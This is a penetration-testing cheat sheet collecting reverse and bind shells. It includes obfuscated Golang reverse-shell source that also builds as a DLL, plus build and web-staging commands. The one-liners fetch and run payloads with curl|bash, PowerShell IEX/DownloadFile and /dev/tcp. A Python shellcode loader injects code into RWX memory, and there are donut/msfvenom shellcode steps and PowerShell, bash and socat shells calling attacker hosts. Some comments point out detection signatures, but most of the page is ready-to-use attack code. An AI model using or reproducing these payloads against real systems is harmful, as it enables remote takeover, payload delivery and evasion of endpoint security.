Shells

Generic

Golang Windows & Linux reverse shell

package main

import (
  "C"
  "bufio"
  "errors"
  "flag"
  "fmt"
  "net"
  "os"
  "os/exec"
  "path/filepath"
  "runtime"
  "time"
)

// dst is the listener address ("host:port") that EdwardsDial connects to.
// It is intentionally empty in source and injected at link time; the build
// lines further down this page use -ldflags "-X main.dst=$LHOST:$LPORT".
var dst string

// abc is a lookup table of single characters. None of the process names the
// program needs ("cmd.exe", "/bin/bash", "/bin/sh", "/usr/bin/script",
// "/dev/null", "start", "/c") appear as literals; they are concatenated from
// this table at run time, presumably so that they do not show up intact in
// the binary. The concatenations are trivial to reconstruct (see the comments
// in EdwardsDial and PalmerDetach), and the resulting process names are what
// process-creation telemetry will record.
var abc []string = []string{"a", "e", "b", "c", "s", "/"}

// webreq is a fixed, HTTP-looking request that EdwardsDial writes to the
// socket immediately after connecting. It is sent to dst, not to the host
// named in the Host header, so a Host header that does not match the
// destination is a usable network signature for this sample.
var webreq string = "GET /" + "george" + "/kindness HTTP/1.1\r\nHost:" + " reynolds.s3.amazonaws.com\r\nUser-Agent:" + " strawberry/0.2.1\r\nAccept:" + " application/json\r\n\r\n"

// GardnerFileExist reports whether os.Stat on filePath fails with something
// other than os.ErrNotExist. Any other Stat failure (permission denied, a
// broken path component) therefore also yields true, so the result means
// "not known to be missing" rather than "definitely exists".
func GardnerFileExist(filePath string) bool {
  _, error := os.Stat(filePath) // the local name shadows the builtin error type in this scope
  return !errors.Is(error, os.ErrNotExist)
}

// EdwardsDial connects to dst over TCP and attaches an interactive shell to
// the socket. It is the --child side of the program (see main) and is also
// exported for the c-shared build, where the DLL loader on this page resolves
// it by name.
//
// What the block does, in order:
//   - Retries a failed Dial every second by calling itself; the recursion has
//     no upper bound, so each failed attempt adds a stack frame.
//   - Writes a fixed HTTP-looking request and blocks until the peer sends one
//     line. The Host header names a host that is not the real destination.
//   - Picks the shell from the abc table: "cmd.exe" on Windows; otherwise
//     "/bin/bash -i", replaced by "/usr/bin/script /dev/null -qc /bin/bash"
//     when script exists, or by "/bin/sh" when bash does not.
//   - Runs it with stdin, stdout and stderr all set to the socket, and
//     discards the exit status.
//
//export EdwardsDial
func EdwardsDial() {
  conn, err := net.Dial("t"+"c"+"p", dst) // "tcp"
  if err != nil {
    time.Sleep(time.Duration(1000 * time.Millisecond))
    EdwardsDial() // unbounded retry by recursion
    return
  }
  fmt.Fprintf(conn, webreq)              // Fake HTTP Request (webreq holds no % verbs, so Fprintf passes it through unchanged)
  bufio.NewReader(conn).ReadString('\n') // Wait for any response line; the text and any error are ignored
  bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1]} // "cmd.exe"
  if runtime.GOOS != "windows" {
    bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[2] + abc[0] + abc[4] + "h", "-" + "i"} // "/bin/bash", "-i"
    if GardnerFileExist(bin[0]) { // Check if file exist (see GardnerFileExist: true also on non-ENOENT errors)
      testbin := []string{abc[5] + "u" + abc[4] + "r" + abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + abc[3] + "r" + "i" + "p" + "t", abc[5] + "d" + abc[1] + "v" + abc[5] + "n" + "u" + "l" + "l", "-" + "q" + abc[3], bin[0]} // "/usr/bin/script", "/dev/null", "-qc", "/bin/bash"
      if GardnerFileExist(testbin[0]) {
        bin = testbin
      }
    } else {
      bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + "h"} // "/bin/sh"
    }
  }
  cmd := exec.Command(bin[0], bin[1:]...)
  cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn // the socket is the child's only I/O
  cmd.Run() // blocks until the shell exits; its error is dropped
}

// PalmerDetach re-launches the running executable with --child so that the
// connect-back logic runs in a separate process. main calls it when --child
// is not set; the child then runs EdwardsDial.
//
//   - Windows: runs "cmd.exe /c start /b <exe> --child" from the executable's
//     own directory and waits for cmd.exe (not for the started child).
//   - Elsewhere: starts os.Args[0] --child in the current directory, sleeps
//     one second, releases the process handle and sleeps another second.
//
// Every error (Getwd, Start, Wait) is discarded. On the non-Windows path a
// failed Start leaves cmd.Process nil, so the following Release would
// dereference a nil *os.Process and most likely panic.
//
//export PalmerDetach
func PalmerDetach() {
  cwd, _ := os.Getwd() // only used on the non-Windows path
  if runtime.GOOS == "windows" {
    cwd, file := filepath.Split(os.Args[0]) // shadows the outer cwd with the executable's directory
    bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1], abc[5] + abc[3], abc[4] + "t" + abc[0] + "r" + "t", abc[5] + abc[2], file, "-" + "-" + "child"} // "cmd.exe", "/c", "start", "/b", file, "--child"
    cmd := exec.Command(bin[0], bin[1:]...)
    cmd.Dir = cwd
    cmd.Start()
    cmd.Wait() // waits for cmd.exe only; "start /b" has already detached the child
  } else {
    cmd := exec.Command(os.Args[0], "-"+"-"+"child") // "--child"
    cmd.Dir = cwd
    cmd.Start() // error ignored; cmd.Process stays nil on failure
    time.Sleep(time.Duration(1000 * time.Millisecond))
    cmd.Process.Release()
    time.Sleep(time.Duration(1000 * time.Millisecond))
  }
}

// main is the process entry point. Without --child it detaches a copy of
// itself (PalmerDetach); with --child it runs the connect-back logic
// (EdwardsDial). In both cases the process then exits with status 1.
func main() {
  var isChild = flag.Bool("child", false, "run as child")
  flag.Parse()
  if !*isChild {
    PalmerDetach() // Detach program from parent terminal
  } else {
    EdwardsDial() // ReverseShell part
  }
  os.Exit(1) // unconditional non-zero exit, also on the normal path
}
LHOST="192.168.45.245"
LPORT=53
env GOOS=linux GOARCH=amd64 CGO_ENABLED=0 /usr/local/go/bin/go build -o r -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=386 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r32.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -ldflags "-s -w -X main.dst=$LHOST:$LPORT" -buildmode=c-shared -o r.dll main.go
sudo mv r.exe r32.exe r.dll r /var/www/html/

cat <<EOF|sudo tee /var/www/html/r.sh
cd \$(mktemp -d)
curl $LHOST/r -o r || wget $LHOST/r
chmod 755 r;./r
EOF

sudo tail -n 0 -f /var/log/nginx/*.log &
sudo nc -nvlp 53 -s $LHOST
# Windows
(New-Object Net.WebClient).DownloadFile("http://1.2.3.4/r.exe","$env:TEMP\r.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\r.exe"

powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps -NoNewWindow $env:TEMP\r.exe"

# Linux
curl 1.2.3.4/r.sh|bash

# Linux - without curl/wget
nc -lvnp 7777 < /var/www/html/r # Wait for victim, then cancel to close connection
F="/dev/shm/r";cat</dev/tcp/127.0.0.1/7777>$F;chmod 755 $F;$F

# Windows x86 shellcode
CMD='powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps $env:TEMP\r.exe"'
msfvenom -a x86 --platform Windows -p windows/exec CMD="$CMD" -f python -b "\x00\x20" --smallest -v shellcode EXITFUNC=thread

DLL loader example
package main

import (
  "flag"
  "fmt"
  "syscall"
)

// main loads the c-shared build of the program above and calls one of its
// exported entry points, so the shell logic runs inside this host process.
// Without --child it calls PalmerDetach; with --child it calls EdwardsDial.
//
// The library is requested by the bare name "main.dll", which Windows resolves
// through its normal DLL search order (application directory first). The
// build line on this page writes r.dll, so the file has to be renamed or this
// name adjusted for the two to match.
func main() {
  var mod = syscall.NewLazyDLL("main.dll") // loaded lazily; nothing is resolved until Call
  var isChild = flag.Bool("child", false, "run as child")
  var proc = mod.NewProc("EdwardsDial") // default: the connect-back routine
  flag.Parse()
  if !*isChild {
    proc = mod.NewProc("PalmerDetach") // parent: spawn a --child copy instead
  }
  // LazyProc.Call panics if the DLL or the export cannot be found. Both
  // exports are declared without a return value, so ret carries no meaning.
  ret, _, _ := proc.Call()
  fmt.Printf("Return: %d\n", ret)
}

Windows

PowerShell Python Reverse TCP (web staged)

You need the embeddable Python zip from https://www.python.org/downloads/windows/, served as python.zip.

cat <<’EOF’| sudo tee /var/www/html/rs.ps1 $ip=”192.168.1.163”; $port=53; $process=”powershell.exe” $python=”http://$ip/python.zip”; $dir=”$env:TEMP”;$Exists = Test-Path “$dirpython";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,”$dirpython.zip”);Add-Type -assembly “system.io.compression.filesystem”;[io.compression.zipfile]::ExtractToDirectory(“$dirpython.zip”, “$dirpython")} $arguments=@(“-c”,”””import time,socket,os,threading,subprocess as sp;p=sp.Popen([‘$process’],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect((‘$ip’,$port));threading.Thread(target=exec,args=(‘while(True):o=os.read(p.stdout.fileno(),1024);s.send(o);time.sleep(0.01)’,globals()),daemon=True).start();threading.Thread(target=exec,args=(‘while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i);time.sleep(0.01)’,globals())).start()”””) Start-Process -NoNewWindow -FilePath “$dirpythonpython.exe” -ArgumentList $arguments EOF

sudo nc -nvlp 53 -s 192.168.1.163
      cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0
      IEX(New-Object Net.WebClient).downloadString('http://192.168.1.163/rs.ps1')
      EOF

      powershell -E AAAAAAAAAAAAAA==
# Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "AAAAAAAAAAAAAA=="

ShellCode w/ python (web staged)

cat <<'EOF'| xxd -plain | tr -d '\n' | rev | sudo tee /var/www/html/loadsc
import ctypes as c
import gzip
import io
import urllib.request as r
def load(url):
  """Fetch an encoded payload from url and run it in a new thread of this process.

  The payload is expected in the encoding produced by the build lines on this
  page: raw bytes -> hex -> reversed -> gzip. The sequence below (VirtualAlloc
  of a writable+executable region, copy, CreateThread) is the standard
  in-process loader pattern and is precisely the call chain that memory
  scanners and EDR API hooks key on.
  """
  k32 = c.windll.kernel32
  k32.VirtualAlloc.restype = c.c_void_p  # keep the returned address pointer-sized (matters on 64-bit)
  ct = k32.CreateThread
  ct.argtypes = ( c.c_int, c.c_int, c.c_void_p, c.c_int, c.c_int, c.POINTER(c.c_int) )
  ct.restype = c.c_void_p
  # Undo the on-the-wire encoding: gunzip, reverse, then hex-decode.
  buff = bytes.fromhex(gzip.open(io.BytesIO(r.urlopen(url).read()),'rb').read()[::-1].decode("utf-8"))
  lenbuff = len(buff)
  # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX
  # private region, the single most common indicator of injected code.
  space = k32.VirtualAlloc(c.c_int(0),c.c_int(lenbuff),c.c_int(0x3000),c.c_int(0x40))
  buff = ( c.c_char * lenbuff ).from_buffer_copy( buff )
  k32.RtlMoveMemory(c.c_void_p(space),buff,c.c_int(lenbuff))  # copy the payload into the RWX region
  buff = "" ; del buff  # drop the Python-side copy; the name is rebound then deleted
  # Start a thread at the region's base address and block until it exits
  # (-1 is passed where INFINITE is expected).
  handle = ct(c.c_int(0),c.c_int(0),c.c_void_p(space),c.c_int(0),c.c_int(0),c.pointer(c.c_int(0)))
  k32.WaitForSingleObject(handle, -1);
EOF
Call it with python
&$env:TEMP\python\python.exe -c "import urllib.request as r;exec(bytes.fromhex(r.urlopen('http://192.168.1.163/loadsc').read()[::-1].decode('utf-8')));load('http://192.168.1.163/sc')"

Or call it with Start-Process if you don't want interaction (this payload downloads python.zip as well)
cat <<'EOF'| sudo tee /var/www/html/loadsc.ps1
$ip="192.168.45.245"; $loadsc="http://$ip/loadsc"; $sc="http://$ip/sc"
$python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")}
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF

# IEX(New-Object Net.WebClient).downloadString('http://192.168.45.245/loadsc.ps1')

Use donut to "convert" your exe to shellcode
pip3 install donut-shellcode --break-system-packages
python3 -c "import donut; donut.create(file='SweetPotato.exe',output='/tmp/sc',params='--help')"
cat /tmp/sc | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null

# test : msfvenom -p windows/x64/exec CMD="calc.exe" -f raw | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null

PowerShell Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443
# Generate PowerShell command to execute on target
export LHOST="4.3.2.1"
export LPORT="443"
echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo '
$c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT')
$s=$c.GetStream()
$sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ")
$s.Write($sb,0,$sb.Length)
[byte[]]$b=0..65535|%{0}
while(($i=$s.Read($b,0,$b.Length)) -ne 0){
 $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i)
 $sb=(iex $d | Out-String) 2>&1
 $sb2=$sb+"PS "+(pwd).Path+"> "
 $sb=([Text.Encoding]::UTF8).GetBytes($sb2)
 $s.Write($sb,0,$sb.Length)
 $s.Flush()
}
$c.Close()
' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n"
# Result Example
powershell -nop -noni -w Hidden -ep Bypass -e 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

PowerShell Reverse TCP (web staged)

# Attacker Listen 443
sudo nc -nvlp 443
# Serving PS ReverseShell on http://*:80/rs.ps1
LHOST="4.3.2.1"
LPORT="443"
cd $(mktemp -d) && \
echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \
sudo python3 -m http.server --cgi 80
:: Victim, retrieve and launch rs.ps1
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1')

PowerShell bind shell


cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0
$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',8888);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
EOF
# powershell.exe -E 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
# nc 1.2.3.4 8888

Linux

Bash Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443
# Victim Connect 443
bash -c "bash -i >& /dev/tcp/4.3.2.1/443 0>&1"

Socat Bind TCP Shell (encrypted)

Establish an encrypted bind shell with socat and a certificate (public cert + private key)
# Victim - Regroup cert and key
cat server.key server.crt > server.pem

# Victim - Listen 443
sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash

# Attacker - Connect 443
socat - OPENSSL:10.11.0.4:443,verify=0   #Skip certificate check